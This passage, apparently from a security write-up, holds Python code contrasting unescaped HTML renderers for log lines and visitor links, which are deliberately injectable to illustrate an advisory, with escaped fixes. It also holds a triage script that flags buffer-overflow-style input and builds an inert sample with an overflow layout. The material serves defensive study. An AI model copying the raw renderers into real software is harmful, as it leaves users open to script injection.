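def render_error_log_raw(lines):
    """Behaviour the advisory describes: log text is written out as is."""
    return "<pre>\n" + "\n".join(lines) + "\n</pre>"


def render_error_log(lines):
    """Element context: encode &, <, > and quotes before writing into <pre>."""
    return "<pre>\n" + "\n".join(html.escape(line) for line in lines) + "\n</pre>"


def render_visitor_raw(host, path):
    """Behaviour the advisory describes: the request becomes an HTML link."""
    url = "http://" + host + path
    return '<a href="' + url + '">' + url + "</a>"


def render_visitor(host, path):
    """Attribute context: percent-encode the path, then HTML-encode both the
    href value and the visible link text."""
    href = "http://" + host + quote(path, safe="/")
    text = "http://" + host + path
    return '<a href="%s">%s</a>' % (html.escape(href, quote=True),
                                    html.escape(text, quote=True))


if __name__ == "__main__":
    print(render_error_log([error_log_line(ERRLOG_PATH)]))
    print(render_visitor("www.site.com", VISITOR_PATH))
```

The link renderer needs both steps because the same string lands in two contexts: percent-encoding keeps the quote from closing the attribute, and HTML encoding keeps the visible text from being parsed as markup.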
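Dave Korn's breakdown of hello-world.c, quoted above, suggests what a check on an untrusted "source" file can look for before any tool is run over it: one overlong line, non-text bytes, a long run of one byte, and a 32-bit word repeated back to back. This is an added example, not from the post; the thresholds and function names are assumptions, and the sample is constructed with placeholder bytes where the shellcode sat.

```python
import struct
MAX_LINE = 256   # buffer size Dave Korn infers for securecode's line reader
MIN_RUN = 32     # assumed threshold for a suspicious repeated-byte run

def longest_run(data):
    """Return (byte_value, length) of the longest run of one repeated byte."""
    best, i = (None, 0), 0
    while i < len(data):
        j = i
        while j < len(data) and data[j] == data[i]:
            j += 1
        if j - i > best[1]:
            best = (data[i], j - i)
        i = j
    return best

def repeated_dwords(data, min_repeat=4):
    """(offset, value, count) for 32-bit LE words repeated back to back."""
    hits, off = [], 0
    while off + 4 * min_repeat <= len(data):
        word, n = data[off:off + 4], 1
        while data[off + 4 * n:off + 4 * n + 4] == word:
            n += 1
        if n >= min_repeat and len(set(word)) > 1:
            hits.append((off, struct.unpack("<I", word)[0], n))
            off += 4 * n
        else:
            off += 1
    return hits

def triage_line(line):
    """Findings for one line of a file that claims to be C source."""
    body, findings = line.rstrip(b"\r\n"), []
    if len(body) > MAX_LINE:
        findings.append("line of %d bytes exceeds %d" % (len(body), MAX_LINE))
    nontext = sum(1 for b in body if b != 9 and not 32 <= b < 127)
    if nontext:
        findings.append("%d non-printable bytes" % nontext)
    value, run = longest_run(body)
    if run >= MIN_RUN and not 32 <= value < 127:
        findings.append("run of %d x 0x%02x" % (run, value))
    for off, word, n in repeated_dwords(body):
        findings.append("0x%08x x %d at offset 0x%x" % (word, n, off))
    return findings

# Constructed sample with the layout from the post; 0xCC bytes stand in for
# the shellcode, so the sample is inert.
SAMPLE = (b"A" * 256 + struct.pack("<I", 0xBFFFF321) * 8 +
          b"\x90" * 600 + b"\xcc" * 16 + b"\r\n")
```

`triage_line(SAMPLE)` reports all four findings, with the repeated word at offset 0x100 as in the post's layout, while an ordinary source line returns an empty list.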